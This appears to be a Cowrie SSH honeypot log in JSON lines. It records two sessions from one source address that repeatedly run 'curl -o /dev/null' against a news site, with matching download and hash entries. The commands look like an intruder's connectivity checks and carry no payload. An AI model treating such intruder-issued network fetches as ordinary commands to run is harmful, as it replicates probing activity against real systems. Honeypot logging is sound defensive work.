{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.469524Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.470754Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.474808Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.477679Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.505196Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.506294Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.510032Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.512512Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.513435Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.524800Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.544143Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.545393Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.549719Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.550851Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.584037Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.585320Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.587713Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.588963Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.595572Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.624312Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.625597Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.628081Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.629164Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.631533Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.648452Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.663683Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.664924Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.667254Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.668554Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.679428Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.704213Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.705463Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.707638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.708476Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.711694Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.725694Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.732934Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.746419Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.747763Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.750374Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.751426Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.753793Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.764628Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.770914Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.773584Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.788377Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.789886Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.794336Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.795732Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.846978Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.848231Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.856212Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.857293Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.865254Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.895078Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.896468Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.900750Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.901943Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.941256Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.942245Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.945877Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.947274Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.948336Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.977118Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.983915Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.985687Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.988281Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.989883Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.994538Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.996686Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.997904Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.001381Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.010250Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.031734Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.033107Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.046492Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.049529Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.067211Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.075555Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.076469Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.077555Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.091427Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.092868Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.123762Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
